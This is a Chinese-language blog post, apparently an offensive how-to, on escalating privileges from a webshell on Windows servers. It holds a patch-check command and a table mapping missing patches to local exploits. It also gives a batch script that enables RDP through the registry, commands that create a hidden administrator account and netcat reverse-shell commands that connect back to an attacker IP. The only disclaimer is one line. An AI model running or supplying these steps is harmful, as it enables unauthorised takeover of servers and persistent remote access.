权限提升

简介: 权限提升

一、基于WebShell的提权

1、访问大马,查看权限

http://192.168.1.147/dm.asp

0a2653c851af460fa595bd959398a8f1.png

2、如果遇到拒绝访问什么可以上传一个aspx的大马,这个权限比较大

http://192.168.1.147/da.aspx

0eacb84100b54626af849e6b562bf92a.png

二、window提权

1、查看系统打补丁情况

win2003:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:Windows\tmp\temp.txt

2d65d23f6d4748949b924e4057485923.png

通用型:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:WindowsTemptemp.txt

2、补丁对照表,上传exe,执行命令

KB952004 :MS09-012 PR

KB956572 :MS09-012 巴西烤肉

KB2393802:MS11-011

KB2592799:MS11-080

KB2621440:MS12-0203

KB2160329:MS10-048

KB970483 :MS09-020  iis6提权(可能是)

KB2124261,KB2271195 MS10-065 IIS7提权(可能是)

KB977165 :MS10-015

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB3077657 MS15_077 字体提权

KB944653 MS07-067

KB952004 MS09-012

KB971657 MS09-041

KB2620712 MS11-097

kb942831 MS08-005

KB2503665 MS11-046

KB2592799 MS11-080

3、由于存在PR提权漏洞,所以上传一个pr.exe执行

2e9b90b2ca334476abebe75bafe6eeaa.png

4、一般哪些目录有读写权限

日志,缓存、回收站、大马所在目录

5、开启3389,命令行

新建一个bat文件,里面输入以下内容,上传到相应目录

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

命令行执行

/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"

0a2653c851af460fa595bd959398a8f1.png

2、用工具开3389端口

0eacb84100b54626af849e6b562bf92a.png2d65d23f6d4748949b924e4057485923.png

3、创建用户并添加管理员组

net user abc 123 /add

net localgroup administrators abc /add

三、数据库提权

0a2653c851af460fa595bd959398a8f1.png

XP_CMDSHELL开启方法,新建查询

0eacb84100b54626af849e6b562bf92a.png2d65d23f6d4748949b924e4057485923.png

四、反弹shell

1、正向连接,主动连接服务器,服务器开启相应端口

2、反向连接,服务器主动连接我们,我们监听某一端口

小攻: nc -lvvp 1234

小受(webshell):nc.exe -e cmd.exe 192.168.1.133(小攻ip) 1234

3、获取权限

0a2653c851af460fa595bd959398a8f1.png

4、linux系统nc -e /bin/bash 小攻ip 1234

禁止非法,后果自负

目录
相关文章
|
6月前
设置权限
【6月更文挑战第16天】设置权限。
61 2
|
7月前
|
SQL 关系型数据库 MySQL
|
数据安全/隐私保护
14-企业权限管理-角色关联权限操作
14-企业权限管理-角色关联权限操作
|
存储 Linux 数据安全/隐私保护
特殊权限| 学习笔记
快速学习特殊权限
124 0
特殊权限| 学习笔记
cetnos6下特殊权限
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396740 ...
1200 0
|
存储 安全
|
Linux 安全 Windows